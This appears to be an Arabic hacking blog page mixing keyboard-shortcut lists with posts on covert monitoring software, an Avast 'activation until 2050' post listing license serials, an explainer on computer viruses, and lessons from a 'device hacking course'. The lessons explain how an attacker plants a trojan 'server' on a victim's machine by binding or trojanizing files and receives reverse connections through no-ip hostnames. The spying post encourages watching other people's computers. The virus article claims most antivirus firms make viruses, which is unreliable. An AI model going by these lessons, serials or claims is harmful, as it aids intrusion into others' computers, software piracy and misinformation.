• الصيانة وتبادل الخبرات
  • قسم تعلم الهكر
  • قسم تعلم البرمجة
  • قسم اختراق الشبكات
  • قسم اختراق المواقع
  • قسم تحميل البرامج
  • Translate

    sa3a

    بحث هذه المدونة الإلكترونية

    إنضم إلى صفحتنا على الفيسبوك

    https://www.facebook.com/Professional.abbad
    ‏إظهار الرسائل ذات التسميات الوندوز. إظهار كافة الرسائل
    ‏إظهار الرسائل ذات التسميات الوندوز. إظهار كافة الرسائل

    الجمعة، 20 سبتمبر 2013

    كيف تتجسس وتراقب أي جهاز عن بعد

    بسم الله الرحمن الرحيم                                     
    أهلا بزوار مدونة المحترف 
    أقدم لكم برنامج classroom spy professiona هو عبارة عن أداة كبيرة للتجسس ومراقبة الأجهزة الأخرى المتصلة بنفس الشبكة ، بل يمكنك التحكم فيها بشكل كامل من خلال جهازك .
    أعد هذا البرنامج خصيصا للأقسام الدراسية في مادة الحاسوب والتي  يمكن لأستاد الفصل معرفة ما يدور على الأجهزة الأخرى ، ولرؤساء الأعمال والشركات الذين يحتاجون إلى مراقبة أعمال موظفيهم ، وهذا لا يعني أن أي شخص لا يستطيع استعمال البرنامج ، بل يمكن أن يخدمك أيضا في التجسس على الحواسب الأخرى المتصلة معك بنفس الشبكة .
    فقد تكون أب لطفل صغير أو ولي أمر أخ صغير لك وتريد مراقبة ما يقوم به على حاسوبه وأنت على جهازك ، لهذا فالبرنامج سوف يكون مفيد لك إلى حد كبير



                                   
                                            
    البرنامج في بيئة عمله  يجب أن تقوم بتثبته على حواسيب أخرى التي تريد مراقبتها ، بعد ذلك تقوم بإضافة معلومات الأيبي و إسم الجهاز إلى البرنامج الذي قمت بتثبيته على حاسوبك ، بعد ذلك سوف تكون قادرا على استعراض ما يقوم به الآخر على حاسوبه ، ويمكنك أيضا إطفاء هذا الجهاز أو إعادة تشغيله ، وإرسال رسائل إلى مستخدم هذا الكومبيوتر ..إلخ 

     رابط تحميل برنامج classroom spy professiona

    classroom spy professiona

    الجمعة، 9 أغسطس 2013

    أختصارات الكيبورد<لوحة المفاتيح>

    Shift + E : الضمة
    Shift + X : السكون
    Shift + Q : الفتحة
    ذ + Shift : الشدة
    Shift + Z : المدة
    Shift + W : تنوين فتح
    Shift + S : تنوين وشولهوشولهرة
    Shift + R : تنوين ضم
    Shift + T : لإ
    Shift + G : لأ
    Shift + Y : إ
    Shift + H : أ
    Shift + N : آ
    Shift + B : لآ
    Shift + V : {
    Shift + C : }
    Shift + F : ]
    Shift + D : [
    Shift + J : تمديد الحرف
    Ctrl + C : نسخ
    Ctrl + X : قص
    Ctrl + V : لصق
    Ctrl + Z : تراجع
    Ctrl + A : تعليم الملف
    Shift + U : فاصلة معكوسة
    Ctrl + ESC : قائمة المهام
    Ctrl + Enter : ابتداء صفحة جديدة
    Ctrl + Shift : لغة عربية ( يمين )
    Ctrl + Shift : لغة إنجليزية ( يسار )
    Ctrl + 1 : مسافة مفردة
    Ctrl + 5 : مسافة سطر ونصف
    Ctrl + 2 : مسافة مزدوجة
    Ctrl + G : الانتقال إلى صفحة
    Ctrl + END : الانتقال إلى نهاية الملف
    Ctrl + F5 : تصغير نافذة الملف
    Ctrl + F6 : الانتقال من ملف لأخر
    Ctrl + F2 : معاينة الصفحة قبل الطباعة
    = + Ctrl : تكبير وتصغير درجة واحدة
    F4 : تكرار أخر عملية
    Alt + Enter : تكرار أخر عملية
    Ctrl + Y : تكرار أخر عملية
    Ctrl + F9 : فتح قوسين جاهزين
    Shift + F10 : تعداد نقطي ورقمي
    F12 : حفظ بأسم
    Shift + F12 : حفظ الملف
    Ctrl + Home : أول المستند
    Ctrl + End : أخر المستند
    Shift + F1 : معلومات عن نوع التنسيق
    Ctrl + U : سطر تحت النص
    Ctrl + F4 : خروج من الملف
    Ctrl + N : ملف جديد
    Ctrl + H : استبدال
    Ctrl + I : خط مائل
    Ctrl + K : تنسيق المستند
    Ctrl + P : طباعة
    Ctrl + O : فتح منطقة
    د + Ctrl : تكبير النص
    ج + Ctrl : تصغير النص
    Alt + S : قائمة تنسيق
    Alt + J : قائمة تعليمات
    [ + Alt : قائمة جدول
    ] + Alt : قائمة أدوات
    Alt + U : قائمة عرض
    Alt + P : قائمة تحرير
    Alt + L : قائمة ملف
    “ + Alt : قائمة إطار
    Alt + Q : تعديل مسطرة
    Ctrl + E : توسيط النص
    Ctrl + F : بحث
    Ctrl + B : خط أسود
    Ctrl+Shift + P : حجم الخط
    Ctrl+Shift + S : نمط
    Ctrl + D : خط
    Ctrl+Shift + L : وضع نقطة عند بداية النص
    Ctrl+Alt + E : حواشي سفلية ترقيم روماني
    Ctrl+Alt + R : وضع علامة ®
    Ctrl+Alt + T : وضع علامة ™
    Ctrl+Alt + C : وضع علامة ©
    Ctrl+Alt + I : معاينة الصفحة قبل الطباعة
    Shift + F7 : قاموس المرادفات
    Ctrl+Alt + F1 : معلومات النظام
    Ctrl+Alt + F2 : فتح الدلائل
    Ctrl + J : تسوية النص من الجانبين
    Ctrl + L : بداية النص من الجانب الأيسر
    Ctrl + Q : بداية النص من الجانب الأيمن
    Ctrl + E : توسيط النص
    Ctrl + M : تغيير المقاس الأعلى للفقرة
    Shift + F5 : رجوع إلى الموضع الذي انتهيت منه عند إغلاق الملف
    = + Ctrl + Alt : تخصيص
    F3 : إدخال نص تلقائي
    F9 : تدقيق حقول
    F10 : تحريك إطار لفتح النوافذ
    F1 : تعليمات
    F5 : الانتقال إلى
    F7 : تدقيق إملائي
    F8 : تعليم منطقة

    ctrl+a : يعمل هذا الامر بتحديد الكل للنصاو الكائن

    ctrl+c : يعمل هذا الامر بنسخ الذي تم تحديده

    ctrl+v: يعمل هذا الامر بلصق المنسوخ
    ctrl+x : يعمل هذا الامر بقص الذي تم تحديدة

    ctrl+z : هذا الامر مهم جذا يمكنك التراجع عن اي امر عملته
    ctrl+p : هذا الامر يعطي لبرنامج النتصفح او اي برنامج امر بالطباعة
    ctrl+o : يمكنك فنح ملف من اي برنامج عن طريق هذا الامر
    ctrl+w : يمكنك اغلاق اي نافذة مفتوحة
    ctrl+d : امر يجعل برنامج التصفح يحفظ الصفحة المعروضة الي المفضلة
    ctrl+f : يمكن لك بحث في البرنامج عن الكلمة
    ctrl+b : يمكن لك ترتيب ملف المفضلة عن طريق هذا الامر
    ctrl+s : حفظ العمل الذي قمت به
    ctrl+shift: يجعل مؤشر الكتابة يذهب الى اليسار
    ctrl+shift : يجعل المؤشريذهب الى اليمين
    alt+f4 : أمر مفيد يقوم بإغلاق النوافذ
    alt+esc : يمكنك التنقل من نافذة الى نافذة
    alt+tab : امر مفيد جدا لك اذا كان هنالك نوافذ كثيرة مفتوح يمكنك اختيار الفاذة المطلوبة
    alt+shift: اليسار يحول الكتابة من العلابي الى انجليزي
    alt+shift : اليمين يحول الكتابة من انجليزي الى عربي
    f2 : امر مفيد وسريع يمكنك من تغير اسم ملف محدد

    الاثنين، 15 يوليو 2013

    تفعيل برنامج الحماية AVAST بكل اصداراته الى غاية 2050

                                بسم الله الرحمن الرحيمتفعيل برنامج الحماية AVAST بكل اصداراته الى غاية 2050



    كيفية تنشيط برنامج Avast
    مع ملف ترخيص ساري المفعول


    أولا تنزيل نسخة تجريبية مباشرة. ثم تثبيت ذلك وأثناء التثبيت، استخدم واحد من
    ملفات ترخيص، أو تثبيته على أنه مجاني، ثم اتبع الخطوات التالية:


    خطوة 1. انقر على الحق "Avast Tray Icon" ثم انقر
    على "Open avast! user interface".

    خطوة 2. انقر على زر "MAINTENANCE" ثم "Subscription".

    خطوة 3. الآن، إذا كان لديك ملف الترخيص مع * تمديد.avastlic، ثم انقر
    فوق "Insert license file"، وانتقل إلى حيث وجود الملف في القرص
    الصلب الخاص بك وفتحه، ثم انقر على زر "Yes".

    إستمتع!


    اختر احد هذي السريلات






    W8301083R9900D1199-U0WWYJ3V
    W3763548R9900D1199-K9R2KVTJ
    W05378648R9900W0544-PCLDH5HR
    S74899179R9900P9449-YF458DTC
    W1252851R9900D1199-T8RY444V
    W4247525R9900D1199-YFPDPHM6
    W6473252R9900D1199-U13143F8

    الجمعة، 14 يونيو 2013

    فيروس الحاسوب


    بسم الله الرحمن الرحيم

    فيروس الحاسوب هو برنامج خارجي صنع عمداً بغرض تغيير خصائص الملفات التي يصيبها لتقوم بتنفيذ بعض الأوامر إما بالإزالة أو التعديل أو التخريب و ما شابهها من عمليات. اي ان فيروسات الكومبيوتر هي برامج تتم كتابتها بغرض إلحاق الضرر بكومبيوتر آخر، أو السيطرة عليه، وتتم كتابتها بطريقة معينة.
    http://abbadhassan.blogspot.com/


    يتصف فيروس الحاسب بأنه :

    1– برنامج قادر على التناسخ Replication والانتشار. 2- الفيروس يربط نفسه ببرنامج أخر يسمى الحاضن host . 3-لا يمكن أن تنشأ الفيروسات من ذاتها . 4-يمكن أن تنتقل من حاسوب مصاب لآخر سليم . يتكون برنامج الفيروس بشكل عام من أربعة أجزاء رئيسية وهي : 1-آلية التناسخ The Replication Mechanism :

    وهو الجزء الذي يسمح للفيروس أن ينسخ نفسه .
    2-آلية التخفي The Protection Mechanism :

    وهو الجزء الذي يخفي الفيروس عن الاكتشاف.
    3- آلية التنشيط The trigger Mechanism :

    وهو الجزء الذي يسمح للفيروس بالانتشار قبل أن يعرف وجوده كاستخدام توقيت الساعة في الحاسوب كما في فيروس (Michelangelo) الذي ينشط في السادس من آذار من كل عام .
    4- آلية التنفيذ The Payload Mechanism :

    وهو الجزء الذي ينفذ الفيروس عندما يتم تنشيطه .
    طرق انتقال الفيروسات (العدوى): يمكن أن نميز فئتين من فيروسات الحاسوب تبعاً لآلية العدوى وانتشار الفيروس :

    .1فيروس العدوى المباشر Direct Infector :

    عندما يتم تنفيذ برنامج مصاب بفيروس من هذا النوع, فإن ذلك الفيروس يبحث بنشاط عن ملف أو أكثر لينقل العدوى إليه, وعندما يصاب أحد الملفات بالعدوى فإنه يقوم بتحميله إلى الذاكرة وتشغيله ,وهذا النوع قليل الانتشار.
    • 2.- فيروس العدوى غير المباشر Indirect Infector : • عندما يتم تنفيذ برنامج مصاب بفيروس من هذا النوع, فإن ذلك الفيروس سينتقل إلى ذاكرة الحاسوب ويستقر فيها, ويتم تنفيذ البرنامج الأصلي ثم يصيب الفيروس بالعدوى كل برنامج يتم تحميله إلى الذاكرة بعد ذلك, إلى أن يتم قطع التغذية الكهربائية عن الحاسوب أو إعادة تشغيله.

    فهرست [إخفاء]
    1 أسباب التسمية
    2 أعراض الإصابة
    3 أنواع الفيروسات
    4 لماذا يعمل الناس فيروسات الحاسوب
    5 انظر أيضاً

    أسباب التسمية
    سمي الفيروس (Virus) بهذا الاسم لأنها تشبه تلك الكائنات المتطفلة في صفتين رئيسيتين: اولا : فالفيروسات دائماً تتستر خلف ملف آخر، ولكنها تأخذ زمام السيطرة على البرنامج المصاب. بحيث أنه حين يتم تشغيل البرنامج المصاب، يتم تشغيل الفايروس أيضا ثانيا : تتواجد الفايروسات في مكان أساسي في الحاسب كالذاكره رام مثلا وتصيب اي ملف يشغل في أثناء وجودها بالذاكره مما يزيد عدد الملفات المصابه كلما طال وقت اكتشاف الفايروس تستخدم عادة لغة التجميع (الاسمبلي) لكتابة كود تنفيذ الفيروس

    أنواع الملفات التي يمكن ان يصيبها الفيروس:

    l الملفات ذاتية التنفيذ مثل ملفات ذات امتداد (.EXE ,.COM.)ضمن أنظمة التشغيل دوس و ميكروسوفت ويندوز ,أو (ELF) في أنظمة لينكس l سجلات الملفات والبيانات(VOLUME BOOT RECORD) في الاقراص المرنة والصلبة والسجل رقم (0) في القرص الصلب MASTER BOOT l ملفات الاغراض العامة مثل ملفات الباتش والسكريبت في ويندوز وملفات الشل في يونيكس l ملفات الاستخدام المكتبي في النوافذ (WINDOWS) التي تحتوي ماكرو مثل الوورد والاكسل واكسس l قواعد البيانات وملفات الاوتولوك لها دور كبير في الاصابة ونشر الاصابة لغيرها اما تحويه من عناوين البريد الالكتروني l ملفات الاكروبات (PDF) وبعض النصوص المهجنة (HTML) احتمال احتوائها على كود خبيث

    أعراض الإصابة
    * تكرار رسائل الخطأ في أكثر من برنامج.

    ظهور رسالة تعذر الحفظ لعدم كفاية المساحة.
    تكرار اختفاء بعض الملفات التنفيذية.
    حدوث بطء شديد في إقلاع[نظام التشغيل]أو تنفيذ بعض التطبيقات. رفض بعض التطبيقات للتنفيذ.
    فعند تشغيل البرنامج المصاب فإنه قد يصيب باقي الملفات الموجودة معه في قرص صلب أو المرن, لذا يحتاج الفيروس إلى تدخل من جانب المستخدم كي ينتشر, بطبيعة الحال التدخل عبارة عن تشغيله بعد أن تم جلبه من الايميل أوانترنت أو تبادل الاقراص المرنة.
    تعمل الفيروسات بطبيعتها على تعطيل عمل الحاسوب أو تدمير ملفاته وبرامجة هناك فيروسات تعمل على خلق رسائل مزعجة و أنواع تعمل على تشغيل برامج غير مطلوبة وأنواع تعمل على اشغال المعالج بحيث تبطئ سرعة الحاسوب أو سرقة بيانات من حاسوب المستخدم مثل ارقام حسابات و كلمات السر أو ارقام بطاقات الائتمان و بيانات مهمة أخرى وهذه أهم اهداف الفيروسات الحديثة وبرامج التجسس التي يتم تطويرها يوما بعد يوم

    أنواع الفيروسات
    أنواع الفيروسات ثلاثة الفيروس والدودة وحصان طروادة) ما الفرق بين الفيروس والدودة وحصان طروادة؟

    •الفيروس: يمكن القول بأنه برنامج تنفيذي(ذات نوع scr,.pif,.bat,.exe ,.com.) يعمل بشكل منفصل ويهدف إلى أحداث خلل في نظام الحاسوب وتترواح خطورتة حسب مهمته فمنه الخطير ومنه الخفيف وكلاهما خبيث.وينتقل بواسطة نسخ الملفات من جهاز به ملفات مصابة إلى جهاز اخر عن طريق الاقراص المدمجة سي دي و ذواكر الفلاش .

    •الدودة (worm ): فيروس ينتشر فقط عبر الشبكات والانترنت ويعمل على الانتشار على الشبكات عن طريق دفتر عنواين البريد الالكتروني مثلا فعند اصابة الجهاز يبحث البرنامج الخبيث عن عناوين الاشخاص المسجلين في دفتر العناوين على سبيل المثال ويرسل نفسه إلى كل شخص وهكذا ... مما يؤدي إلى انتشاره بسرعه عبر الشبكه وقد اختلف الخبراء فمنهم اعتبره فايروس ومنهم من اعتبره برنامج خبيث وذلك كون الدوده لاتنفذ اي عمل مؤذي انما تنتشر فقط مما يؤدي إلى اشغال موارد الشبكه بشكل كبير ومع التطور الحاصل في ميدان الحوسبه أصبح بامكان المبرمجين الخبيثين إضافة سطر برمجي لملف الدوده بحيث تؤدي عمل معين بعد انتشارها ( مثلا بعد الانتشار إلى عدد 50000 جهاز يتم تخريب الأنظمة في هذه الأجهزة ) أو اي شئ اخر ( مثلا في يوم معين أو ساعة أو تاريخ ...الخ ) وأصبحت الديدان من أشهر الفيروسات على الشبكه العالميه واشهر عملياتها التخريبيه واخطرها تلك التي يكون هدفها حجب الخدمه تسمى ( هجمات حجب الخدمه ) حيث تنتشر الدوده على عدد كبير من الأجهزة ثم توجه طلبات وهميه لجاهز خادم معين ( يكون المبرمج قد حدد الخادم المستهدف من خلال برمجته للدوده ) فيغرق الخادم بكثرة الطلبات الوهميه ولا يستطيع معالجتها جميعا مما يسبب توقفه عن العمل وهذه الديدان استهدفت مواقع لكثير من الشركات العالميه اشهرها مايكروسوفت وغيرها الكثير .

    •حصان طروادة Trojan Horse: سمي هذا الفيروس بحصان طروادة لانه يذكر بالقصة الشهيرة لحصان طروادة حيث اختبأ الجنود اليونان داخله واستطاعوا اقتحام مدينة طرواده والتغلب على جيشها وهكذا تكون الية عمل هذا الفيروس حيث يكون مرفقا مع أحد البرامج أي يكون جزء من برنامج دون ان يعلم المستخدم. فعندما يبدأ البرنامج تنفيذ عمله ويصل إلى مرحلة ما حيث تم توزيع قرص مجاني على المشافي به برنامج حول مرض الايدز ( اسبابه - طرق انتشاره - طرق العلاج .. الخ ) وبعد مدة شهر من تشغيل البرنامج تم تشفير المعلومات على الحواسب الحاضنه للفايروس وظهرت رساله مفادها ان الحاسب مصاب بالايدز ( المقصود هنا انه تم تشفير ملفات الحاسب وايقافها عن العمل بطريقه نظاميه ) ارسل مبلغ كذا إلى الحساب كذا ليتم إرسال رقم فك الشيفره مما اجبر المختصين بالرضوخ للطلب كونهم لم يستطسعو فك التشفير . توجد عدة تقسيمات للفيروسات، فمثلاً من حيث سرعة الانتشار هناك فيروسات سريعة الانتشار وفيروسات بطيئة الانتشار ومن حيث توقيت النشاط فيروسات تنشط في أوقات محددة وفيروسات دائمة النشاط ومن حيث مكان الإصابة فيروسات مقطع التشغيل boot sector على الأقراص وهي الأكثر شيوعاً، وفيروسات الماكرو macro التي تختص بإصابة الوثائق والبيانات الناتجة عن حزمة مايكروسوفت أوفيس، أما من حيث حجم الضرر فهناك الفيروسات المدمرة للأجهزة طبعا لايوجد فايروسات خارقه بحيث انها تدمر الأجهزة كما نسمع احيانا ( احترق المعالج بسبب الفايروس تعطلت وحدة التغذيه بسبب الفايروس أو تلفت الشاشة بسبب الفايروس ،... الخ ) ولكن يمكن للفايروس ان يؤذي الذاكره روم في الحاسب كما في فايروس تشرنوبل أو ان يمحي معلومات ال (MBR (Main Boot Sector على القرص الصلب فتعود الاقراص الصلبه كما اتت من المصنع وفي الحالتين السابقتين لا يتم اقلاع الجهاز مما يوحي للبعض ان الفايروس ( حرق ) الحاسب طبعا هذه الفيروسات تعتبر خطيره جدا لانها تتسبب في اتلاف البيانات المخزنه والتي قد تكون (البيانات) نتاج عشرات السنين مما يؤديي إلى خسائر جسيمة أو إلى توقف الحاسبات عن العمل كما في تشرنوبل مما يؤدي إلى توقف الخدمات المقدمه ، وهنالك أيضا الفيروسات المدمرة للبرامج وتاثيرها محدود طالما ان البيانات لم تتاثر حيث يمكن تخزين البيانات واعادة تهئية الحاسب واعادة البرامج المتضرره من اقراصها الاصليه، والفيروسات عديمة الضرر وهي التي لاتقوم باي عمل مؤذي وانما تم برمجتها لاثبات الذات والقدره على البرمجه من بعض المراهقين فمنها ما يرسم كرة أو اي شكل على الشاشه طوال فترة عمل الكمبيوتر ومنها ما يغير بعض الاحرف ( كتغير حرف بحرف اينما وجد ) أو تغيير مؤشر الماوس .. الخ.

    فيروس Brontok أو الفيروس الذي يخفي خيارات المجلداو يفقدك التحكم في الرجستري فتصبح غير قادر على التحكم في الحاسوب: هذا الفيروس من أبرز مهامه أنه يقوم بإخفاء خيارات المجلد من قائمة أدوات الموجودة في نظام الويندوز وأيضا يقوم بتكرار جميع المجلدات التي يصيبها حتى أنك لاتعرف الأصل من النسخة وقد تحذف الأصل ظنا منك أنه الفيروس ، وهو أيضا يقوم بفتح شاشة الإنترنت اكسبلورر ويقوم بفتح شاشة خضراء اللون بشكل مستمر ممايسبب بطء في النظام ووما يؤدي ألى زيادة انتشار هذا الفيروس في الكمبيوتر

    فيروس xcopy والذي يصيب الـ Partion القسم للقرص الصلب ويجعله لايفتح مباشرة وذلك بزرع ملف auotorun وحينما تحاول فتح القسم يعطيك قائمة فتح باستخدام ولا تستطيع الدخول إلى القسم الذي تريده إلا بطرق ملتوية مثل (استكشاف و تشغيل ) للمحترفين فقط ويقوم أيضا بجعل الفلوبي دسك القرص المرن يصيح باستمرار مطالبا بإدخال قرص مرن للكمبيوتر تصنيف الفيروسات حسب خطورتها : 1- العادي Trivial : لا يفعل الفيروس العادي شيئا سوى التكاثرreplication ولا يسبب أي ضرر أو تخريب للمعلومات مثل فيروس stupid 2- الثانوي Minor : يصيب الملفات التنفيذية فقط executable file ولا يؤثر على البيانات 3- المعتدل Moderate : يقوم بتدمير جميع الملفات الموجودة على القرص إما باستبدال المعلومات بمعلومات لا معنى لها أو عن طريق إعادة التهيئة Reformatting مثل فيروس Disk killer الذي يقوم بإعادة تهيئة القرص . ويمكن حل مشكلة هذه الفيروسات عن طريق استخدام النسخ الاحتياطي 4- الرئيسي Major : يؤدي الفيروس إلى تخريب المعلومات بإجراء تغيرات ذكية وبارعة للبيانات دون أن يترك أثرا يشير إلى التغيير الحاصل كأن يقوم بتبديل كتل المعلومات المتساوية في الطول بين الملفات كما أن تأثيره يكون على المدى الطويل ولن يكون من الممكن اكتشاف الإصابة إلا بعد بضعة أيام وبذالك لا يمكن الوثوق بالنسخة الاحتياطية أيضا . 5- اللامحدود Unlimited : يستهدف الشبكات والملفات المشتركة وتمضي أكثر الوقت في محاولة معرفة كلمة السر للمستخدمين الأكثر فاعلية وعند معرفتها يقوم بتمريرها إلى أحد أو أكثر من مستخدمي الشبكة على أمل أنهم سيستخدمونها لأغراض سيئة . ترينا الفيروسات كم نحن معرضين للهجوم ولكن بالمقابل ترينا مدى التعقيد والترابط الذي وصل إليه الإنسان . على سبيل المثال My doom : قدر الخبراء الحواسيب المتضررة من هذه الدودة بحوالي ربع مليون حاسوب خلال يوم واحد والذي كان في كانون الثاني 2004 Melissa: أعطى هذا الفيروس فاعلية كبيرة جدا حيث أجبر شركة Microsoft والعديد من كبرى الشركات الأخرى على إطفاء مخدمات البريد بشكل كامل حتى تمكنوا من القضاء عليه وذلك في آذار 1999 وفي الشهر الأول من عام 2007 ظهرت دودة اسمها Storm وبحلول الشهر التاسع كان أكثر من 50 مليون حاسوب مصاب . كلنا تصور أن كل هذا التأثير ينتج عن برامج بسيطة جدا. فيروس Melissa : أنشاء الفيروس على شكل مستند Word ووضع في موقع للأخبار عندما يقوم أي شخص بتحميل الملف وفتحه فإن الفيروس يتفعل ويقوم بإرسال المستند إلى أول 50 شخص في الAddress book والمستند يحوي على ملاحظة لطيفة واسم الشخص المرسل إليه وعندما يقوم المرسل إليه بفتح المستند يتم إرساله إلى 50 شخص أخر وبهذه الطريقة أصبح فيروس Melissa أسرع فيروس في الانتشار

    استخدم الفيروس I love you الطريق نفسها لكن عوضا عن نخس نفسه تلقائيا فأنه كان يربط كوده برابط معين ضمن الرسالة وعند النقر عليه كان يرسل نفسه إلى جميع العناوين الموجودة في الAddress book استخدم الفيروس ميزة الVBA (visual basic for application ) وهي لغة برمجة كاملة وتستطيع من خلالها أن تبرمج أي شيء مثل تعديل ملف أو إرسال الرسائل الالكترونية أي يمكنك كتابة أي برنامج وعند فتح المستند يتم تنفيذه طبعا هي ميزة مفيدة ولكنها في نفس الوقت ميزة تنفيذ تلقائية خيرة

    لماذا يعمل الناس فيروسات الحاسوب
    فيروسات الحاسوب لا تتشابه في وجودها بالفيروسات الحيوية. إن فيروس الحاسوب لا ينشئ من لا شيء أو لا ياتي من مصدر مجهول أو لا ينشئ بسبب خلل بسيط حدث في الحاسوب. فيروس الحاسوب يتم برمجته من قبل المبرمجين أو الشركات ويتم صنعه بشكل متعمد ويتم تصميمة بشكل متقن. يعمل المبرمجون على برمجة الفيروسات وذلك لاهداف عديدة تتنوع من اقتصادية وسياسية وتجارية وعسكرية. فبعض المبرمجينالهواة يعتبرون أن عمل الفيروس نوع من الفن والهواية التي يمارسونها. ومن أهم الأهداف لعمل فيروس الحاسوب هو الهدف التجاري. ذلك عن طريق عمل وصنع الفيروسات من أجل بيع برامج مضادات الفيروسات لانة بعمل الفيروس يصبح المستخدمون بحاجة إلى برامج مضادة للفيروسات ويضطرون للشراء. يذكر أن المبرمج الذي يعمل الفيروس يعتبر حسب القانون مجرما وصناعة الفيروس جريمة يحاسب عليها حسب قانون الدولة الموجود بها.

    معظم شركات مضادات الفيروسات تقوم بصناعة الفيروسات من قبل المبرمجين وتقوم بعمل مضادات لها وذلك لتسويق منتجاتها وبرامجها لدى مستخدمي الكمبيوتر. اما الاهداف العسكرية فهي محاولة الدخول لانضمة الطرف الاخر لكشف اسرار و اخذ بيانات عن طريق برامج التجسس . الاهداف الاجرامية فأهمها سرقة بيانات وارقام حسابات أو ارقام بطاقات الائتمان و كلمات السر لمحاولة الدخول لحسابات المشتركين في البنوك وسرقة اموالهم . ان سرقة بينات من اجهزتهم لاْبتزازهم








    واخيرا.....

    ( سبحانك اللهم وبحمدك ، أشهد أن لا إله إلا أنت أستغفرك وأتوب إليك )


    الخميس، 13 يونيو 2013

    الدرس الثاني: شرح مفهوم الاتصال العكسي بين المخترق والضحية


    معنى اليوم شرح سهل و مهم وحتاج منك التركيز 

    شرح كيف تتم عملية التصال الإتصال العكسي :هو نقل المعلومات [ البيانات ] من جهاز لاخر مباشره عن طريق الاي بي 

    ماذا يقصد بنقل البيانات مباشرة من جهاز لآخر عن طريق الأي بي ؟ 
    الجميع يعلم إن الأنترنت هو عباره عن شبكه عالميه تتصل بها الاجهزه من مختلف الدول ولكن لا تتصل هذه الأجهزه بطريقة عشوائيه علي الشبكه 
    ولكن لكل جهاز عنوان مميز له علي هذه الشبكه يسمي بالأي بي IP مايهمنا في مجال الاختراق هو معرفه كيف نقل تلك المعلومات من جهاز الضحيه إلي جهاز المخترق حتي يتم الإتصال فيما بينهم 
    في لحظه تشغيل الباتش علي جهاز الضحيه يقوم الباتش بإرسال عنوان جهاز الضحيه [ IP ] علي شبكه الإنترنت إلي جهاز المخترق حتي يقوم بالإتصال به 

    ولكن المشكلة التي واجهت تلك الخطوه هو تغير رقم الـ IP الخاص بالأجهزه علي شبكه الأنترنت بطريقة ديناميكية عند كل انقطاع اتصال الجهاز بالانترنت واعاده الاتصال 
    بمعني أصح ان رقم الأي البي الخاص بك يتغير بإستمرار في حالات انقطاع الانترنت مما يؤدي إلي تغير عنوانك علي الشبكه وعدم وصول معلومات الإتصال إلي جهازك 
    ولذلك نقوم بإستخدام الشركات الداعمه للإتصال العكسي مثل الـ No-Ipالذي اتي شرح التسجيل عليهم في دروس سابقة لهذا الدرس 
    وفكرة عملهم هي تكوين هوست نايم خاص بك مثآل : back-connect.no-ip.info 
    هذا الهوست يحتوي علي معلومات الأي بي الحاليه لجهازك والتي يقوم البرنامج الذي قمت بتنصيبه علي جهازك [ برنامج no-ip بتزويده برقم الأي بي الحالي لجهازك في حاله أي تغيير يطرأ عليه 
    لذى تآتي آليه إيصآل المعلومات من جهاز الضحيه إلي جهاز المخترق في الشكل النهائي 



    كما موضع بالصوره:


    يرسل الباتش المعلومات للهوست إللي إنت كونته عن طريق الشركات الداعمه للإتصال العكسي والذي يقوم بتوجيه المعلومات إلي جهازك مباشرة 
    وبذلك يعمل الهوست إللي كونته كـ IP ثابت لك علي شبكة الأنترنت
    وتسمى هذه العمليه عملية التبليغ 
    التبليغ:هو وصول معلومات الإتصال بجهاز الضحية إلي جهاز المخترق ليتم الإتصال به والتحكم به عن بعد.
    اما بالنسبه لآليه نقل البيانات من الجهاز إلي الشبكه عن طريق المنافذ [Ports] سنتناولها في دروس لاحقه

    أتمني أن تكون وصلت المعلومة....


    انتظروني في طرح باقي الدروس من الدورة


    ( مقدمة ) - دورة آختراق الأجهزة

    مقدمة في اختراق الاجهزه عن طريقة برامج الاختراق


    يعتمد مخترقين الاجهزه عن طريق برامج الاختراق علي فتح جهه اتصال مابين جهاز الضحية وجهاز المخترق
    حيث يقوم المخترق بتثبيت باتش [server]وتشغيله علي جهاز الضحية عن طريق احد الثغرات او الدمج او التلغيم مما يقوم بارسال معلومات الاتصال بواسطه الاتصال العكسي عن طريق الأي بي [IP] إلي الجهاز الخاص بالمخترق حتي يتلقاها البرنامج ويقوم بالاتصال بجهاز الضحية مباشرة عن طريق احد البورتات [ المنافذ ]المتاحه والمحدده بواسطه المخترق وتسمي هذه العمليه بالتبليغ




    الضحية :الجهاز الذي يعمل به الباتش والمتحكم بواسطه المخترق 

    برنامج الإختراق :برنامج يقوم بصنع باتش [ خادم ] والتحكم في نظام التشغيل الخاص بالجهاز المصاب بالخادم 

    الباتش [ Server ] :او مايسمي بـ [الخادم] ملف يصنع بواسطه برامج الاختراق يحمل معلومات الاتصال بالبرنامج حيث يعمل علي استخدام احد المنافذ المتاحه للإتصال ببرنامج الاختراق وتزويده بمعلومات الاتصال بالجهاز الضحيه للتحكم به 

    الإتصال العكسي :هو نقل المعلومات [ البيانات ] من جهاز لاخر مباشره عن طريق الاي بي 

    الأي بي [IP]:عنوان الجهاز علي شبكه الانترنت وهو رقم علي النحو التالي 157.435.435.342 يتغير بطريقة ديناميكية 

    البورت [ Port منفذ ] :منفذ في لوحه التحكم الخاصه بإتصال الجهاز بالانترنت يتيح تبادل المعلومات من خلاله 

    التبليغ : وهو وصول المعلومات الخاصه بجهاز الضحيه إلي جهاز المخترق حتي يقوم بالإتصال به

    الدمج [ Bind ] :هو دمج ملفين او اكثر داخل ملف واحد هذا الملف يقوم بنسخ هذه الملفات الي داخل الجهاز بطريقة مخفيه ثم يقوم بتشغيلها بعد عمليه النسخ 

    التلغيم :هو اصابه ملف بالباتش في حاله تشغيل تلك الملف يقوم بتشغيل الباتش كأنه احد ملفاته



    ملاحظة مهمة اقرا هذي المعلومات جيدا مره ورمتين لين تحفضها لنها
    راح تساعدك كثير في فهم الدروسوفي عالم الهكر اكثر واسرع


    انتظروني في طرح باقي الدروس من الدورة

    الثلاثاء، 11 يونيو 2013

    افضل واسهل اختصارات لوحة المفاتيح

    www.abbad.tk


    1 – الضغط على زر شعار الوندوز

    إظهار وإخفاء قائمة ابدأ


    2- زر شعار الوندوز + زر Break ( موجود فوق الأرقام)

    يعرض نافذة مواصفات النظام

    3- زر شعار الوندوز + D

    يعرض سطح المكتب

    4- زر شعار الوندوز + M

    يقوم بتصغير جميع النوافذ المفتوحة

    5- زر شعار الوندوز + Shift + M

    يقوم بتكبير جميع النوافذ

    6- زر شعار الوندوز + E

    يعرض نافذة جهاز الكمبيوتر

    7- زر شعار الوندوز + F

    إذا أردت البحث عن ملفات ومجلدات

    8- Ctrl + زر شعار الوندوز + F

    إذا أردت البحث عن أجهزه داخل نطاق الشبكة

    9- زر شعار الوندوز + F1

    إذا أردت قراءة المساعد للوندوز

    10 – زر شعار الوندوز + L

    لقفل لوحة المفاتيح

